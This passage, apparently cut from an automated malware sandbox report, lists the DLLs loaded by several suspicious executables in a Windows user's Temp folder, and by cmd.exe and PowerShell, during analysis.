Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: dpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: mozglue.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wsock32.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: vcruntime140.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: msvcp140.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: pcacli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: dui70.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: duser.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: chartv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: oleacc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: atlthunk.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wtsapi32.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: winsta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: explorerframe.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: schannel.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mskeyprotect.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ntasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: gpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncrypt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncryptsslp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: mscoree.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rasapi32.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rasman.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rtutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: secur32.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: schannel.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: mskeyprotect.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ntasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ncrypt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ncryptsslp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: gpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: edputil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: appresolver.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: bcp47langs.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: slc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: sppc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
